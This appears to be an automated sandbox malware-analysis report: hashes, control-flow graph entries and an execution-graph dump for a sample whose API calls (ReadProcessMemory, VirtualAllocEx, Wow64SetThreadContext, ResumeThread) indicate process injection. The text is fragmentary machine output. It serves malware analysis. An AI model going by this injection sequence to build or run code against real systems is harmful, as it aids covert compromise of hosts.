                          • Opcode ID: f9c2110fe0a2d716b9dc220d924ea7c15ae7c41147352bc2220fb485d58ccf08
                          • Instruction ID: 99c313bebb13ecb73e76326a3349c9e7ad754a5e90afe3ae426dbc42216cea64
                          • Opcode Fuzzy Hash: f9c2110fe0a2d716b9dc220d924ea7c15ae7c41147352bc2220fb485d58ccf08
                          • Instruction Fuzzy Hash: EE41C8B4D002589FCF10CFA9D884AEEFBB1BF49310F20942AE814B7250C334A956CF65

                          Control-flow Graph

                          control_flow_graph 1219 17f800-17f8c8 ReadProcessMemory 1222 17f8d1-17f923 1219->1222 1223 17f8ca-17f8d0 1219->1223 1223->1222
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0017F8B2
                          Memory Dump Source
                          • Source File: 0000000F.00000002.400237296.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_170000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 65958ccf55095441ef9e21a1cc2c660885bc0f8907c611e14757553934291b1a
                          • Instruction ID: 3bbeeb4c1d0a01b553cab8adbb701ad03e3db322b80af1e4741c9199fcd84730
                          • Opcode Fuzzy Hash: 65958ccf55095441ef9e21a1cc2c660885bc0f8907c611e14757553934291b1a
                          • Instruction Fuzzy Hash: 4941B9B5D002589FCF10CFA9D984AEEFBB1BF49310F10942AE814B7240D734A945CF65

                          Control-flow Graph

                          control_flow_graph 1228 17f571-17f638 VirtualAllocEx 1231 17f641-17f68b 1228->1231 1232 17f63a-17f640 1228->1232 1232->1231
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0017F622
                          Memory Dump Source
                          • Source File: 0000000F.00000002.400237296.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_170000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: f117bdd5dcd003e1410831562fe635e420dbdb2e2fd065383189f660116ecb47
                          • Instruction ID: 154716d7da3fae0f70355bd8e08648e01285481d459e4574eb4180940e9ad00d
                          • Opcode Fuzzy Hash: f117bdd5dcd003e1410831562fe635e420dbdb2e2fd065383189f660116ecb47
                          • Instruction Fuzzy Hash: FE41A9B9D002489FCF10CFA9D984AEEFBB1BB49310F20942AE815B7310D735A956CF65

                          Control-flow Graph

                          control_flow_graph 1237 17f578-17f638 VirtualAllocEx 1240 17f641-17f68b 1237->1240 1241 17f63a-17f640 1237->1241 1241->1240
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0017F622
                          Memory Dump Source
                          • Source File: 0000000F.00000002.400237296.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_170000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 911ed0ac3da94df17435ee843655515b4827892450c332eeeeff3e005fc63a31
                          • Instruction ID: d2e21cb6997433604dc512e75aeacbd2641bab8a9210408bd4299c6760d19563
                          • Opcode Fuzzy Hash: 911ed0ac3da94df17435ee843655515b4827892450c332eeeeff3e005fc63a31
                          • Instruction Fuzzy Hash: 5B4198B8D002589FCF10CFA9D984AEEFBB1BB49310F20942AE815B7310D735A956CF65

                          Control-flow Graph

                          control_flow_graph 1246 17f441-17f4a8 1248 17f4bf-17f50d Wow64SetThreadContext 1246->1248 1249 17f4aa-17f4bc 1246->1249 1251 17f516-17f562 1248->1251 1252 17f50f-17f515 1248->1252 1249->1248 1252->1251
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 0017F4F7
                          APIs
                          • ResumeThread.KERNELBASE(?), ref: 0017F3D6
                          • API String ID:
                          • Opcode ID: 728cdd3ab79e59fbc1ba10a37e212d6a37f362efce7de1297dfb36c9e96aa7a8
                          • Instruction ID: e3f1727f159b6aed9eafdfdea10a63b43234e8313d6497ad8b20ac74683d3862
                          • Opcode Fuzzy Hash: 728cdd3ab79e59fbc1ba10a37e212d6a37f362efce7de1297dfb36c9e96aa7a8
                          • Instruction Fuzzy Hash: C1F04935A04268DFCB10CFA0CD44AECBBB5EB49301F1040DAD40AA7252D6316A86DF11
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f217d1daebe2c0bdb6e544305e7c3657dd02e8385763801f9105976f8b6305c4
                          • Instruction ID: a93f8a9e38e327c95e5c6825a25b58b9f789ca5e9e0d3929013adbb54d14cab7
                          • Opcode Fuzzy Hash: f217d1daebe2c0bdb6e544305e7c3657dd02e8385763801f9105976f8b6305c4
                          • Instruction Fuzzy Hash: 9CF07F74949628CFDBA0CF14D8A47E8B6B5BB19355F1050DAD40AA2241E7746ED5DF00
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 70df4c86701a520acc9edbbc3c981d9c26d0ba1407d222b290529041834c0569
                          • Instruction ID: 9dc7796c12431cee3e4271a526ba2da7ef60e02ea9a8fa06d98d51087287ce59
                          • Opcode Fuzzy Hash: 70df4c86701a520acc9edbbc3c981d9c26d0ba1407d222b290529041834c0569
                          • Instruction Fuzzy Hash: 9CF01234D092889FCB02CBB9D59155CBFF0AF46200F1981DAD48297362C2344D05DF01
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1e3a3dbf698b0f458bc9fefd98172339b0f1e5c7901b989272bd68e2a5d0ce43
                          • Instruction ID: 76d80406140ca3f41b4b9ddf1de32cf9159912d497cf28ec6eb6061e96c2a5b4
                          • Opcode Fuzzy Hash: 1e3a3dbf698b0f458bc9fefd98172339b0f1e5c7901b989272bd68e2a5d0ce43
                          • Instruction Fuzzy Hash: 20E0DF709092488FCB068BA4AC512EC7FF8EF83204F14829AC94663211E2341E57CB41
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8be0ca8fe9177a266dd15535e6bfd21f2da1b58d38cda4ba7f95984cbdf28e63
                          • Instruction ID: c7f66e012b2916f06b81d399ef5520fda58b2b1a44603bda2791422382059228
                          • Opcode Fuzzy Hash: 8be0ca8fe9177a266dd15535e6bfd21f2da1b58d38cda4ba7f95984cbdf28e63
                          • Instruction Fuzzy Hash: 1DF01C74949114CFEB50DF24C989BECB7B8AB09310F1441DAD80DAB296DB71AE86DF20
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 579e89f811d7d3184fb1c888dc9d738d994934386b6b7e21f8eae4e9e74791bb
                          • Instruction ID: ea76bf3ed58f367f6334149e931044fa1c2b96ed6cb7a29f0c5ba1b243ce1cf5
                          • Opcode Fuzzy Hash: 579e89f811d7d3184fb1c888dc9d738d994934386b6b7e21f8eae4e9e74791bb
                          • Instruction Fuzzy Hash: 6CE0A574D452099FCB44DFA8E8686ADBBB8BB89301F10D1AAC819A3354E7705E11DF44
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 994a6e25e787c5a9d357efb07fab725a03b2596a951a1d124783b8d7b1ec3e0e
                          • Instruction ID: 9acc7d7a1b024339bc2a3754048a33d4344d7c5f4442595a6bba1a247b717981
                          • Opcode Fuzzy Hash: 994a6e25e787c5a9d357efb07fab725a03b2596a951a1d124783b8d7b1ec3e0e
                          • Instruction Fuzzy Hash: E4E06D708093849FCB06CBB898563DC7FF09B46200F1445D6C8449A261E3344E58CB11
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 004076d45d5694cb312aef19e67c74b7005364bed3e3514c2d10e876fa6c8e88
                          • Instruction ID: 30045772dfbd0497d59f445f0e94626097411d66f61716cfda10b43926c92bac
                          • Opcode Fuzzy Hash: 004076d45d5694cb312aef19e67c74b7005364bed3e3514c2d10e876fa6c8e88
                          • Instruction Fuzzy Hash: 21E01A75F15608DBCF00DFA8E4409ECB7F4FB8D314B006426D419B3218E631A8268F54
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f73616c6dd99ffbb82c0e8181206a7219d654c11bad514ffdfb608136f4c3ea3
                          • Instruction ID: 7f837cd5dd009732863a6dd934999b078887d241b8f6228ac13018fd0910bec3
                          • Opcode Fuzzy Hash: f73616c6dd99ffbb82c0e8181206a7219d654c11bad514ffdfb608136f4c3ea3
                          • Instruction Fuzzy Hash: 32E0B63691D704CFCB18CF6194583FCB6B8B75B34AF00A02AD045A21A2F3345996DF28
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d7febaf856b50c75344abbac3eae160f7dd99365cedab37acdba2811d30cef1c
                          • Instruction ID: 036953bd54f80462e3ebadfccfe022270a70adffeb8748823411a23b2cdb2184
                          • Opcode Fuzzy Hash: d7febaf856b50c75344abbac3eae160f7dd99365cedab37acdba2811d30cef1c
                          • Instruction Fuzzy Hash: FDE0867084A3809FD31B8B7498213293FB59F43204B1542DAC491966A1D7354D15CBA2
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 49476233d1c15e90b2a6e2cf3318415c6fc364fb9ad7eb1d13d20a73588af60d
                          • Instruction ID: f190c0dea5d0785a88acf0081f7bdc07e1f2282806f6fc18f0a76be3545a599e
                          • Opcode Fuzzy Hash: 49476233d1c15e90b2a6e2cf3318415c6fc364fb9ad7eb1d13d20a73588af60d
                          • Instruction Fuzzy Hash: FDF06DB49182849FC745DFB8D85429CBFF0AB0A200F6441DAC444D7361D3348E25CF01
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ff270476f2d89f075b3f6d4489c4ab3ed1a0752bc899625203ae70fe9e4bf09a
                          • Instruction ID: 85ac35c126db140e34b4d86ccd0fb288ec5462956b804646e4e2c8236117bae2
                          • Opcode Fuzzy Hash: ff270476f2d89f075b3f6d4489c4ab3ed1a0752bc899625203ae70fe9e4bf09a
                          • Instruction Fuzzy Hash: 1FE08C7040D2D88FD30787A4AC2626A3FA89B03204B0942CAC441DB2A2CA344E01CB62
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6edfdfb2751eb0355241a78b19782c0b76e7b400714a42196b1ee274095926e8
                          • Instruction ID: 71e191a65c5b7073191694b69962983ace0f9f69c7de4da1096848d633ddeab4
                          • Opcode Fuzzy Hash: 6edfdfb2751eb0355241a78b19782c0b76e7b400714a42196b1ee274095926e8
                          • Instruction Fuzzy Hash: 5BE04F30D192848FC7069FB4AC5A3AC7FF0EF46201F1441EADC82962A1D6384A46DB52
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7b5dc274c02d66ad9701b63edb06025c8de16bbec699b7e8b7fe3f4d10e6768b
                          • Instruction ID: cc406249dde4c77f8ef6cfb122bf1c1c06fc9cb530cc6365418f4934304e4008
                          • Opcode Fuzzy Hash: 7b5dc274c02d66ad9701b63edb06025c8de16bbec699b7e8b7fe3f4d10e6768b
                          • Instruction Fuzzy Hash: 92E0657A900219AFCB00CF90C940BE8BBB9EB08300F1080C5D509A3284CB31AE82DF10
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1a3512f719de621b7a7e672684aa684536cd990757d878b5c32c00412619ef8a
                          • Instruction ID: 2066d28aa0ba3c7d6a9e2c9dba2541f6ee9ae26b6ebff8e7b19e7b9741a95f4b
                          • Opcode Fuzzy Hash: 1a3512f719de621b7a7e672684aa684536cd990757d878b5c32c00412619ef8a
                          • Instruction Fuzzy Hash: FAE01279A48618DFDF54CF90CD90BECBBB5AB48304F20509A950DAB391D3755E85DF00
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d9e346e4c1f753c94a66f86377a79b506f5dec251f9a5eafa4596d0ae35b3692
                          • Instruction ID: f70593bf6dad6c5b57f4953082480ed9113c575b0ce85044fa99319d52ec1004
                          • Opcode Fuzzy Hash: d9e346e4c1f753c94a66f86377a79b506f5dec251f9a5eafa4596d0ae35b3692
                          • Instruction Fuzzy Hash: 2EE0867080A3D4DFDB16DBB495213AC7FB19B03305F5441EAC4849A2A1D7354A59DF11
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ad6dedb7709ceb234483eed55b348e8e73a11c8028cb851ea3046646ceb315b1
                          • Instruction ID: 34ab88a2b749718b8e65eb076b2f62d9dc8fef7e0a9a0d406c3a84834f8db3b8
                          • Opcode Fuzzy Hash: ad6dedb7709ceb234483eed55b348e8e73a11c8028cb851ea3046646ceb315b1
                          • Instruction Fuzzy Hash: 31E0261680E3D5CBEB028B2078E129CFF349B47208F0514CAC48467193EB010216C706
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 69321aa90786ac939c46469f6f72d4391df2981e395b6ddb8f67b4f49df30d56
                          • Instruction ID: b12be6a2be55d175d45d44594a7cbe4cfb0b96bbb31fd1a897eaf8602648639e
                          • Opcode Fuzzy Hash: 69321aa90786ac939c46469f6f72d4391df2981e395b6ddb8f67b4f49df30d56
                          • Instruction Fuzzy Hash: 37E01238D00208AFCB04DFA9D4446ACBBB4AB49300F1480EAD84057360D630AA00DF81
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b159949aa53e6e44021489b7a800745c4ea322b28a632a6f8eb563b8b6198415
                          • Instruction ID: b047802abe2db382789db500682392a7b26249e1893fc66b7dfb8c7c8267028f
                          • Opcode Fuzzy Hash: b159949aa53e6e44021489b7a800745c4ea322b28a632a6f8eb563b8b6198415
                          • Instruction Fuzzy Hash: C6E0B674910218DFC744DFA8D58479CBBF4AB09301F2041A9D909D7360E730AE54DF41
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ae9af1c8494352bd02582ecf0ea0c55747fd5260194a085af98629ea577ad10f
                          • Instruction ID: adfc217d84b07f035f8b209e6f06ca947a290c21ac45ff4a1645b2d79e3fb2a5
                          • Opcode Fuzzy Hash: ae9af1c8494352bd02582ecf0ea0c55747fd5260194a085af98629ea577ad10f
                          • Instruction Fuzzy Hash: 42D012704051149ED709CFA4D9147AC7F699752301F545296C404E3264DB310D16CF15
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7f10d8b5760a3b736e2d902f104de292098e443c91dcb37bbd599e1cc80ae1fe
                          • Instruction ID: 87d53c2c210bab49c787362378f6c49ab18bc2d8b9e816d7f64e42eff371650e
                          • Opcode Fuzzy Hash: 7f10d8b5760a3b736e2d902f104de292098e443c91dcb37bbd599e1cc80ae1fe
                          • Instruction Fuzzy Hash: 6FD017349091189BC704DBA8E9406ADBBB8AB42300F1442AAC90923240E6302E96DB85
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1e82afee9410e1ef8d5ee874b97f25fa3308fac774c463c1f161b0daad445a64
                          • Instruction ID: 42e2286911e220413aa9aa0ac57ad4c93d9bcad4b4f01ed4c88fc177927c73b9
                          • Opcode Fuzzy Hash: 1e82afee9410e1ef8d5ee874b97f25fa3308fac774c463c1f161b0daad445a64
                          • Instruction Fuzzy Hash: 48D01730D00208EFCB48EFA8D8453DDBBF4AB04200F1440A9C808A3340E7305A94CF81
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 16904132c657943223992a0bd0fdd5199133214238574b1f3b49fcd22232ada1
                          • Instruction ID: b59ba0259e67a918fca403a84366fda065e52e26a33d2606a09f05d49666cbb0
                          • Opcode Fuzzy Hash: 16904132c657943223992a0bd0fdd5199133214238574b1f3b49fcd22232ada1
                          • Instruction Fuzzy Hash: 79D05234C00208EBCB04EFA8E8583ACBFF8AB04202F0440EACC4062390EB301A50DF91
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: be9a9189ef591a9a9efa941071da1cc376378245b92b81b95380b565c03f5882
                          • Instruction ID: 985249fb126ba5f20e555c2088a30b76cc8f80b3f6c7e327d9c6ac2f34bb3544
                          • Opcode Fuzzy Hash: be9a9189ef591a9a9efa941071da1cc376378245b92b81b95380b565c03f5882
                          • Instruction Fuzzy Hash: C4D01270401208DBC708DFE9D915B5DBBFCE746742F04519AD80863250DF312D10DF59
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 75e18f247db54ac37c84766aa5063b404c94485675916bdbf9c314faa28f72bd
                          • Instruction ID: 88ab58007e4c4ee9fe6e41659c85d7cb99177721309451c3465913dfb34b7d8c
                          • Opcode Fuzzy Hash: 75e18f247db54ac37c84766aa5063b404c94485675916bdbf9c314faa28f72bd
                          • Instruction Fuzzy Hash: 95C0123044110C9BC714DF99D811B6D77ACD751354F044099C90453350DB311D10DB95
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 70330fdec53ede415259deca251dbdbb7039eb28b3bf76c6f55dba6d1717f65b
                          • Instruction ID: e899057614bd900011e41b1961b877ea230f7d082f3127c8e0035cb61e9a780b
                          • Opcode Fuzzy Hash: 70330fdec53ede415259deca251dbdbb7039eb28b3bf76c6f55dba6d1717f65b
                          • Instruction Fuzzy Hash: 1AC0123040512DDBC704DBD9D85576D77AC9741345F040199C90453250DB311E10DB95
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b579c713463ad7903aa6922648823ec49057ab4188271d8fb7df67b6b214fd6
                          • Instruction ID: 49be5ee9a77a96fd9a87517f5caefef25bf96a093c83d0803cc051dbea34eb4e
                          • Opcode Fuzzy Hash: 5b579c713463ad7903aa6922648823ec49057ab4188271d8fb7df67b6b214fd6
                          • Instruction Fuzzy Hash: 0EC09B35B45404D7CB00DBD4F4051FCB735DBC7137F001061D10D9355197201F659B55
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6d71d85091b60d14e37e8d0151a8737b1e0489bdc365a0a45f0fd43df3ae5f44
                          • Instruction ID: e550e00875aaea53ef93a12cc18ac2cf4846a0f88196c12c40fe800d1ad53ae5
                          • Opcode Fuzzy Hash: 6d71d85091b60d14e37e8d0151a8737b1e0489bdc365a0a45f0fd43df3ae5f44
                          • Instruction Fuzzy Hash: B5C04830206A00CBD3009F60E80ABAA3772E702309F50600690276326AE7786CA9DA09

                          Execution Graph

                          Execution Coverage:5.6%
                          Dynamic/Decrypted Code Coverage:9.2%
                          Signature Coverage:2.4%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:58
37957->37959 38029 409bca GetModuleFileNameW 37958->38029 37971 411a8b 37959->37971 37961 411b0a wcsrchr 37962 411b22 wcscat 37961->37962 37963 411b1f 37961->37963 38030 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 37962->38030 37963->37962 37965 411b67 38031 402afb 37965->38031 37969 411b7f 38087 40ea13 SendMessageW memset SendMessageW 37969->38087 37972 402afb 27 API calls 37971->37972 37973 411ac0 37972->37973 37974 4110dc 37973->37974 37975 41113e 37974->37975 37980 4110f0 37974->37980 38112 40969c LoadCursorW SetCursor 37975->38112 37977 411143 38113 4032b4 37977->38113 38131 444a54 37977->38131 37978 4110f7 _wcsicmp 37978->37980 37979 411157 37981 40ada2 _wcsicmp 37979->37981 37980->37975 37980->37978 38134 410c46 10 API calls 37980->38134 37984 411167 37981->37984 37982 4111af 37984->37982 37985 4111a6 qsort 37984->37985 37985->37982 37988->37788 37990 40eb10 37989->37990 38002 40e8e0 37990->38002 37993 40eb6c memcpy memcpy 37994 40ebb7 37993->37994 37994->37993 37995 40ebf2 ??2@YAPAXI ??2@YAPAXI 37994->37995 37998 40d134 16 API calls 37994->37998 37996 40ec2e ??2@YAPAXI 37995->37996 37997 40ec65 37995->37997 37996->37997 38012 40ea7f 37997->38012 37998->37994 38001 402f49 38001->37788 38003 40e8f2 38002->38003 38004 40e8eb ??3@YAXPAX 38002->38004 38005 40e900 38003->38005 38006 40e8f9 ??3@YAXPAX 38003->38006 38004->38003 38007 40e911 38005->38007 38008 40e90a ??3@YAXPAX 38005->38008 38006->38005 38009 40e931 ??2@YAPAXI ??2@YAPAXI 38007->38009 38010 40e921 ??3@YAXPAX 38007->38010 38011 40e92a ??3@YAXPAX 38007->38011 38008->38007 38009->37993 38010->38011 38011->38009 38013 40aa04 ??3@YAXPAX 38012->38013 38014 40ea88 38013->38014 38015 40aa04 ??3@YAXPAX 38014->38015 38016 40ea90 38015->38016 38017 40aa04 ??3@YAXPAX 38016->38017 38018 40ea98 38017->38018 38019 40aa04 ??3@YAXPAX 38018->38019 38020 40eaa0 38019->38020 38021 40a9ce 4 API calls 38020->38021 38022 40eab3 38021->38022 38023 40a9ce 4 API calls 38022->38023 38024 40eabd 38023->38024 38025 
40a9ce 4 API calls 38024->38025 38026 40eac7 38025->38026 38027 40a9ce 4 API calls 38026->38027 38028 40ead1 38027->38028 38028->38001 38029->37961 38030->37965 38088 40b2cc 38031->38088 38033 402b0a 38034 40b2cc 27 API calls 38033->38034 38035 402b23 38034->38035 38036 40b2cc 27 API calls 38035->38036 38037 402b3a 38036->38037 38038 40b2cc 27 API calls 38037->38038 38039 402b54 38038->38039 38040 40b2cc 27 API calls 38039->38040 38041 402b6b 38040->38041 38042 40b2cc 27 API calls 38041->38042 38043 402b82 38042->38043 38044 40b2cc 27 API calls 38043->38044 38045 402b99 38044->38045 38046 40b2cc 27 API calls 38045->38046 38047 402bb0 38046->38047 38048 40b2cc 27 API calls 38047->38048 38049 402bc7 38048->38049 38050 40b2cc 27 API calls 38049->38050 38051 402bde 38050->38051 38052 40b2cc 27 API calls 38051->38052 38053 402bf5 38052->38053 38054 40b2cc 27 API calls 38053->38054 38055 402c0c 38054->38055 38056 40b2cc 27 API calls 38055->38056 38057 402c23 38056->38057 38058 40b2cc 27 API calls 38057->38058 38059 402c3a 38058->38059 38060 40b2cc 27 API calls 38059->38060 38061 402c51 38060->38061 38062 40b2cc 27 API calls 38061->38062 38063 402c68 38062->38063 38064 40b2cc 27 API calls 38063->38064 38065 402c7f 38064->38065 38066 40b2cc 27 API calls 38065->38066 38067 402c99 38066->38067 38068 40b2cc 27 API calls 38067->38068 38069 